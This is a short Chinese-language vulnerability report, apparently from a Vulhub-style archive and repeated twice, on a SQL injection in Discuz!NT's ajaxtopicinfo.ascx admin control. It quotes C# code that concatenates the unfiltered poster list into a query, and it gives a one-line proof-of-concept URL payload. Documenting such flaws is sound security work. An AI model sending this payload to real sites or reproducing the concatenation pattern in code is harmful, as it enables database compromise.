VULHUB ™

### 简要描述： Discuz!NT 是康盛创想(Comsenz)旗下的一款功能强大的基于 ASP.NET 平台的社区软件。 ### 详细说明： ajaxtopicinfo.ascx用户控件 poster SQL注入漏洞 ### 漏洞证明： 文件 admin/UserControls/ ajaxtopicinfo.ascx 中 转到函数 GetCondition (WebsiteManage.cs) //62 行 if (posterlist != "") { string[] poster = posterlist.Split(','); condition += " AND [poster] in ("; string tempposerlist = ""; foreach (string p in poster) { tempposerlist += "'" + p + "',"; } if (tempposerlist != "") tempposerlisttempposerlist = tempposerlist.Substring(0, tempposerlist.Length - 1); condition += tempposerlist + ")"; posterlist变量没有过滤直接进入SQL语句查询，造成SQL注入 EXP: /admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1')

### 简要描述： Discuz!NT 是康盛创想(Comsenz)旗下的一款功能强大的基于 ASP.NET 平台的社区软件。 ### 详细说明： ajaxtopicinfo.ascx用户控件 poster SQL注入漏洞 ### 漏洞证明： 文件 admin/UserControls/ ajaxtopicinfo.ascx 中 转到函数 GetCondition (WebsiteManage.cs) //62 行 if (posterlist != "") { string[] poster = posterlist.Split(','); condition += " AND [poster] in ("; string tempposerlist = ""; foreach (string p in poster) { tempposerlist += "'" + p + "',"; } if (tempposerlist != "") tempposerlisttempposerlist = tempposerlist.Substring(0, tempposerlist.Length - 1); condition += tempposerlist + ")"; posterlist变量没有过滤直接进入SQL语句查询，造成SQL注入 EXP: /admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1')